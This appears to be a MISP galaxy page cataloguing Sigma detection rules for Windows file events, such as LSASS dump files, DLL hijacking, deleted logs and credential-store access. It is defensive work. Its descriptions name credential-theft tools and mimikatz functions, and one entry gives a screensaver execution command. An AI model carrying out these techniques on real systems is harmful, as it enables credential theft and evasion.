UUID 0b8baa3f-575c-46ee-8715-d6f28cc7d33c which can be used as unique global reference for NTDS.DIT Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/05
falsepositive ['Unknown']
filename file_event_win_ntds_dit_creation.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']

Potential Persistence Via Notepad++ Plugins

Detects the creation of new ".dll" files inside the plugins directory of a Notepad++ installation by a process other than "gup.exe", which could indicate persistence.

Internal MISP references

UUID 54127bd4-f541-4ac3-afdb-ea073f63f692 which can be used as unique global reference for Potential Persistence Via Notepad++ Plugins in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/10
falsepositive ['Possible FPs during first installation of Notepad++', 'Legitimate use of custom plugins by users in order to enhance notepad++ functionalities']
filename file_event_win_notepad_plus_plus_persistence.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

SafetyKatz Default Dump Filename

Detects the default lsass dump filename used by SafetyKatz.

Internal MISP references

UUID e074832a-eada-4fd7-94a1-10642b130e16 which can be used as unique global reference for SafetyKatz Default Dump Filename in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2018/07/24
falsepositive ['Rare legitimate files with similar filename structure']
filename file_event_win_hktl_safetykatz.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']

Windows Binaries Write Suspicious Extensions

Detects Windows executables that write files with suspicious extensions

Internal MISP references

UUID b8fd0e93-ff58-4cbd-8f48-1c114e342e62 which can be used as unique global reference for Windows Binaries Write Suspicious Extensions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/12
falsepositive ['Unknown']
filename file_event_win_shell_write_susp_files_extensions.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']

ISO or Image Mount Indicator in Recent Files

Detects the creation of a recent element file that points to an .ISO, .IMG, .VHD or .VHDX file, as often used in phishing attacks. This can be a false positive on server systems, but on workstations users should rarely mount .iso or .img files.

Internal MISP references

UUID 4358e5a5-7542-4dcb-b9f3-87667371839b which can be used as unique global reference for ISO or Image Mount Indicator in Recent Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/11
falsepositive ['Cases in which a user mounts an image file for legitimate reasons']
filename file_event_win_iso_file_recent.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']

ScreenConnect Temporary Installation Artefact

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID fec96f39-988b-4586-b746-b93d59fd1922 which can be used as unique global reference for ScreenConnect Temporary Installation Artefact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/13
falsepositive ['Legitimate use']
filename file_event_win_remote_access_tools_screenconnect_artefact.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

Legitimate Application Dropped Executable

Detects programs on a Windows system that should not write executables to disk

Internal MISP references

UUID f0540f7e-2db3-4432-b9e0-3965486744bc which can be used as unique global reference for Legitimate Application Dropped Executable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022/08/21
falsepositive ['Unknown']
filename file_event_win_susp_legitimate_app_dropping_exe.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Suspicious Startup Folder Persistence

Detects when a file with a suspicious extension is created in the startup folder

Internal MISP references

UUID 28208707-fe31-437f-9a7f-4b1108b94d2e which can be used as unique global reference for Suspicious Startup Folder Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/10
falsepositive ['Rare legitimate usage of some of the extensions mentioned in the rule']
filename file_event_win_susp_startup_folder_persistence.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']

Potential Persistence Attempt Via ErrorHandler.Cmd

Detects the creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory, which could be used as a method of persistence. The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.

Internal MISP references

UUID 15904280-565c-4b73-9303-3291f964e7f9 which can be used as unique global reference for Potential Persistence Attempt Via ErrorHandler.Cmd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/09
falsepositive ['Unknown']
filename file_event_win_errorhandler_persistence.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

CrackMapExec File Indicators

Detects file creation events with filename patterns used by CrackMapExec.

Internal MISP references

UUID 736ffa74-5f6f-44ca-94ef-1c0df4f51d2a which can be used as unique global reference for CrackMapExec File Indicators in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/03/11
falsepositive ['Unknown']
filename file_event_win_hktl_crackmapexec_indicators.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']

Renamed VsCode Code Tunnel Execution - File Indicator

Detects the creation of a file with the name "code_tunnel.json", which indicates execution and usage of the VsCode tunneling utility by an "Image" or "Process" other than VsCode.

Internal MISP references

UUID d102b8f5-61dc-4e68-bd83-9a3187c67377 which can be used as unique global reference for Renamed VsCode Code Tunnel Execution - File Indicator in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/25
falsepositive ['Unknown']
filename file_event_win_vscode_tunnel_renamed_execution.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control']

ISO File Created Within Temp Folders

Detects the creation of an ISO file in the Outlook temp folder or in the AppData temp folder. Typical of the Qakbot TTP from end-July 2022.

Internal MISP references

UUID 2f9356ae-bf43-41b8-b858-4496d83b2acb which can be used as unique global reference for ISO File Created Within Temp Folders in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @sam0x90
creation_date 2022/07/30
falsepositive ['Potential FP by sysadmin opening a zip file containing a legitimate ISO file']
filename file_event_win_iso_file_mount.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']

AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

Internal MISP references

UUID d353dac0-1b41-46c2-820c-d7d2561fc6ed which can be used as unique global reference for AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020/10/06
falsepositive ['Unlikely']
filename file_event_win_winrm_awl_bypass.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']

SCR File Write Event

Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.

Internal MISP references

UUID c048f047-7e2a-4888-b302-55f509d4a91d which can be used as unique global reference for SCR File Write Event in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @securepeacock, SCYTHE @scythe_io
creation_date 2022/04/27
falsepositive ['The installation of new screen savers by third party software']
filename file_event_win_new_scr_file.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']

Office Macro File Download

Detects the creation of new Office macro files on the system by an application such as a browser or mail client.

Internal MISP references

UUID 0e29e3a7-1ad8-40aa-b691-9f82ecd33d66 which can be used as unique global reference for Office Macro File Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/23
falsepositive ['Legitimate macro files downloaded from the internet', 'Legitimate macro files sent as attachments via emails']
filename file_event_win_office_macro_files_downloaded.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']

New Custom Shim Database Created

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.

Internal MISP references

UUID ee63c85c-6d51-4d12-ad09-04e25877a947 which can be used as unique global reference for New Custom Shim Database Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/29
falsepositive ['Legitimate custom SHIM installations will also trigger this rule']
filename file_event_win_creation_new_shim_database.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.009']

Potential Webshell Creation On Static Website

Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.

Internal MISP references

UUID 39f1f9f2-9636-45de-98f6-a4046aa8e4b9 which can be used as unique global reference for Potential Webshell Creation On Static Website in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community, Tim Shelton, Thurein Oo
creation_date 2019/10/22
falsepositive ['Legitimate administrator or developer creating legitimate executable files in a web application folder']
filename file_event_win_webshell_creation_detect.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']

Suspicious Get-Variable.exe Creation

Get-Variable is a valid PowerShell cmdlet. The WindowsApps directory is by default in the path where PowerShell is executed, so when the Get-Variable command is issued during PowerShell execution, the system first looks for a Get-Variable executable in the path and executes the malicious binary instead of the PowerShell cmdlet.

Internal MISP references

UUID 0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b which can be used as unique global reference for Suspicious Get-Variable.exe Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/23
falsepositive ['Unknown']
filename file_event_win_susp_get_variable.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1546', 'attack.defense_evasion', 'attack.t1027']

WerFault LSASS Process Memory Dump

Detects WerFault creating a dump file with a name indicating that the dump could be LSASS process memory, which contains user credentials.

Internal MISP references

UUID c3e76af5-4ce0-4a14-9c9a-25ceb8fda182 which can be used as unique global reference for WerFault LSASS Process Memory Dump in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/27
falsepositive ['Unknown']
filename file_event_win_lsass_werfault_dump.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']

Office Macro File Creation

Detects the creation of new Office macro files on the system.

Internal MISP references

UUID 91174a41-dc8f-401b-be89-7bfc140612a0 which can be used as unique global reference for Office Macro File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/23
falsepositive ['Very common in environments that rely heavily on macro documents']
filename file_event_win_office_macro_files_created.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']

Suspicious File Event With Teams Objects

Detects access to the authentication tokens and accounts of the Microsoft Teams desktop application.

Internal MISP references

UUID 6902955a-01b7-432c-b32a-6f5f81d8f624 which can be used as unique global reference for Suspicious File Event With Teams Objects in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery
creation_date 2022/09/16
falsepositive ['Unknown']
filename file_event_win_access_susp_teams.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1528']

Writing Local Admin Share

Adversaries may interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.

Internal MISP references

UUID 4aafb0fa-bff5-4b9d-b99e-8093e659c65f which can be used as unique global reference for Writing Local Admin Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename file_event_win_writing_local_admin_share.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1546.002']

QuarksPwDump Dump File

Detects a dump file written by the QuarksPwDump password dumper.

Internal MISP references

UUID 847def9e-924d-4e90-b7c4-5f581395a2b4 which can be used as unique global reference for QuarksPwDump Dump File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/02/10
falsepositive ['Unknown']
filename file_event_win_hktl_quarkspw_filedump.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']

Powerup Write Hijack DLL

The PowerUp tool's Write Hijack DLL function exploits DLL hijacking for privilege escalation. In its default mode, it builds a self-deleting .bat file which executes a malicious command. The detection rule relies on the creation of the malicious bat file (debug.bat by default).

Internal MISP references

UUID 602a1f13-c640-4d73-b053-be9a2fa58b96 which can be used as unique global reference for Powerup Write Hijack DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Subhash Popuri (@pbssubhash)
creation_date 2021/08/21
falsepositive ['Any powershell script that creates bat files']
filename file_event_win_hktl_powerup_dllhijacking.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1574.001']

Creation Of Non-Existent System DLL

Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.

Internal MISP references

UUID df6ecb8b-7822-4f4b-b412-08f524b4576c which can be used as unique global reference for Creation Of Non-Existent System DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), fornotes
creation_date 2022/12/01
falsepositive ['Unknown']
filename file_event_win_create_non_existent_dlls.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

Wmiprvse Wbemcomn DLL Hijack - File

Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network and loading it for a WMI DLL Hijack scenario.

Internal MISP references

UUID 614a7e17-5643-4d89-b6fe-f9df1a79641c which can be used as unique global reference for Wmiprvse Wbemcomn DLL Hijack - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/12
falsepositive ['Unknown']
filename file_event_win_wmiprvse_wbemcomn_dll_hijack.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.lateral_movement', 'attack.t1021.002']

PowerShell Module File Created By Non-PowerShell Process

Detects the creation of a new PowerShell module file (".psm1", ".psd1", ".dll", ".ps1", etc.) by a non-PowerShell process.

Internal MISP references

UUID e3845023-ca9a-4024-b2b2-5422156d5527 which can be used as unique global reference for PowerShell Module File Created By Non-PowerShell Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/09
falsepositive ['Unknown']
filename file_event_win_powershell_module_uncommon_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

Windows Terminal Profile Settings Modification By Uncommon Process

Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.

Internal MISP references

UUID 9b64de98-9db3-4033-bd7a-f51430105f00 which can be used as unique global reference for Windows Terminal Profile Settings Modification By Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/22
falsepositive ['Some false positives may occur with admin scripts that set WT settings.']
filename file_event_win_susp_windows_terminal_profile.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.015']
Related clusters

To see the related clusters, click here.

DLL Search Order Hijacking Via Additional Space in Path

Detects when an attacker creates a folder structure that mimics Windows system folders (such as "Windows" or "Program Files") but with an added space, in order to trick the DLL load search order and perform a "DLL Search Order Hijacking" attack.

Internal MISP references

UUID b6f91281-20aa-446a-b986-38a92813a18f which can be used as unique global reference for DLL Search Order Hijacking Via Additional Space in Path in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2022/07/30
falsepositive ['Unknown']
filename file_event_win_dll_sideloading_space_path.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Suspicious Scheduled Task Write to System32 Tasks

Detects the creation of tasks from processes executed from suspicious locations

Internal MISP references

UUID 80e1f67a-4596-4351-98f5-a9c3efabac95 which can be used as unique global reference for Suspicious Scheduled Task Write to System32 Tasks in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/11/16
falsepositive ['Unknown']
filename file_event_win_susp_task_write.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.execution', 'attack.t1053']
Related clusters

To see the related clusters, click here.

Suspicious Appended Extension

Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as ".jpg.crypted", ".docx.locky", etc.

Internal MISP references

UUID e3f673b3-65d1-4d80-9146-466f8b63fa99 which can be used as unique global reference for Suspicious Appended Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/07/16
falsepositive ['Backup software']
filename file_rename_win_ransomware.yml
level medium
logsource.category file_rename
logsource.product windows
tags ['attack.impact', 'attack.t1486']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Self Extraction Directive File Created

Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stands for Self Extraction Directive files. These files are used by the "iexpress.exe" utility in order to create self-extracting packages. Attackers have been seen abusing this utility and creating PE files with embedded ".sed" entries. Usually ".sed" files are simple INI files and not PE binaries.

Internal MISP references

UUID ab90dab8-c7da-4010-9193-563528cfa347 which can be used as unique global reference for Potentially Suspicious Self Extraction Directive File Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2024/02/05
falsepositive ['Unknown']
filename file_executable_detected_win_susp_embeded_sed_file.yml
level medium
logsource.category file_executable_detected
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

IIS WebServer Access Logs Deleted

Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID 3eb8c339-a765-48cc-a150-4364c04652bf which can be used as unique global reference for IIS WebServer Access Logs Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/16
falsepositive ['During uninstallation of the IIS service', 'During log rotation']
filename file_delete_win_delete_iis_access_logs.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

TeamViewer Log File Deleted

Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID b1decb61-ed83-4339-8e95-53ea51901720 which can be used as unique global reference for TeamViewer Log File Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/16
falsepositive ['Unknown']
filename file_delete_win_delete_teamviewer_logs.yml
level low
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Potential PrintNightmare Exploitation Attempt

Detects DLL deletions from the Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675.

Internal MISP references

UUID 5b2bbc47-dead-4ef7-8908-0cf73fcbecbf which can be used as unique global reference for Potential PrintNightmare Exploitation Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2021/07/01
falsepositive ['Unknown']
filename file_delete_win_cve_2021_1675_print_nightmare.yml
level high
logsource.category file_delete
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574', 'cve.2021.1675']
Related clusters

To see the related clusters, click here.

Exchange PowerShell Cmdlet History Deleted

Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID a55349d8-9588-4c5a-8e3b-1925fe2a4ffe which can be used as unique global reference for Exchange PowerShell Cmdlet History Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/26
falsepositive ['Possible FP during log rotation']
filename file_delete_win_delete_exchange_powershell_logs.yml
level high
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

Backup Files Deleted

Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.

Internal MISP references

UUID 06125661-3814-4e03-bfa2-1e4411c60ac3 which can be used as unique global reference for Backup Files Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/02
falsepositive ['Legitime usage']
filename file_delete_win_delete_backup_file.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

EventLog EVTX File Deleted

Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID 63c779ba-f638-40a0-a593-ddd45e8b1ddc which can be used as unique global reference for EventLog EVTX File Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/15
falsepositive ['Unknown']
filename file_delete_win_delete_event_log_files.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

File Deleted Via Sysinternals SDelete

Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.

Internal MISP references

UUID 6ddab845-b1b8-49c2-bbf7-1a11967f64bc which can be used as unique global reference for File Deleted Via Sysinternals SDelete in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Legitime usage of SDelete']
filename file_delete_win_sysinternals_sdelete_file_deletion.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Tomcat WebServer Logs Deleted

Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID 270185ff-5f50-4d6d-a27f-24c3b8c9fef8 which can be used as unique global reference for Tomcat WebServer Logs Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/16
falsepositive ['During uninstallation of the tomcat server', 'During log rotation']
filename file_delete_win_delete_tomcat_logs.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

Prefetch File Deleted

Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID 0a1f9d29-6465-4776-b091-7f43b26e4c89 which can be used as unique global reference for Prefetch File Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cedric MAURUGEON
creation_date 2021/09/29
falsepositive ['Unknown']
filename file_delete_win_delete_prefetch.yml
level high
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

PowerShell Console History Logs Deleted

Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence

Internal MISP references

UUID ff301988-c231-4bd0-834c-ac9d73b86586 which can be used as unique global reference for PowerShell Console History Logs Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/15
falsepositive ['Unknown']
filename file_delete_win_delete_powershell_command_history.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

ADS Zone.Identifier Deleted By Uncommon Application

Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.

Internal MISP references

UUID 3109530e-ab47-4cc6-a953-cac5ebcc93ae which can be used as unique global reference for ADS Zone.Identifier Deleted By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/04
falsepositive ['Other third party applications not listed.']
filename file_delete_win_zone_identifier_ads_uncommon.yml
level medium
logsource.category file_delete
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Unusual File Deletion by Dns.exe

Detects an unexpected file being deleted by dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

Internal MISP references

UUID 8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0 which can be used as unique global reference for Unusual File Deletion by Dns.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Elastic (idea)
creation_date 2022/09/27
falsepositive ['Unknown']
filename file_delete_win_unusual_deletion_by_dns_exe.yml
level high
logsource.category file_delete
logsource.product windows
tags ['attack.initial_access', 'attack.t1133']
Related clusters

To see the related clusters, click here.

Access To Potentially Sensitive Sysvol Files By Uncommon Application

Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.

Internal MISP references

UUID d51694fe-484a-46ac-92d6-969e76d60d10 which can be used as unique global reference for Access To Potentially Sensitive Sysvol Files By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/12/21
falsepositive ['Unknown']
filename file_access_win_susp_gpo_access_file.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.006']
Related clusters

To see the related clusters, click here.

Access To Browser Credential Files By Uncommon Application

Detects file access requests to browser credential stores by uncommon processes. Could indicate a potential credential stealing attempt. Requires heavy baselining before usage.

Internal MISP references

UUID 91cb43db-302a-47e3-b3c8-7ede481e27bf which can be used as unique global reference for Access To Browser Credential Files By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/09
falsepositive ['Antivirus, Anti-Spyware, Anti-Malware Software', 'Backup software', 'Legitimate software installed on partitions other than "C:\"', 'Searching software such as "everything.exe"']
filename file_access_win_browser_credential_access.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.t1003', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

Access To Windows DPAPI Master Keys By Uncommon Application

Detects file access requests to the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. An example case would be usage of the mimikatz "dpapi::masterkey" function.

Internal MISP references

UUID 46612ae6-86be-4802-bc07-39b59feb1309 which can be used as unique global reference for Access To Windows DPAPI Master Keys By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/17
falsepositive ['Unknown']
filename file_access_win_dpapi_master_key_access.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.004']
Related clusters

To see the related clusters, click here.

Credential Manager Access By Uncommon Application

Detects suspicious processes, based on name and location, that access the Windows Credential Manager and vault, which can be a sign of credential stealing. An example case would be usage of the mimikatz "dpapi::cred" function.

Internal MISP references

UUID 407aecb1-e762-4acf-8c7b-d087bcff3bb6 which can be used as unique global reference for Credential Manager Access By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/11
falsepositive ['Legitimate software installed by the users for example in the "AppData" directory may access these files (for any reason).']
filename file_access_win_credential_manager_access.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.t1003', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

Access To Windows Credential History File By Uncommon Application

Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. An example case would be usage of the mimikatz "dpapi::credhist" function.

Internal MISP references

UUID 7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2 which can be used as unique global reference for Access To Windows Credential History File By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/17
falsepositive ['Unknown']
filename file_access_win_susp_cred_hist_access.yml
level medium
logsource.category file_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.004']
Related clusters

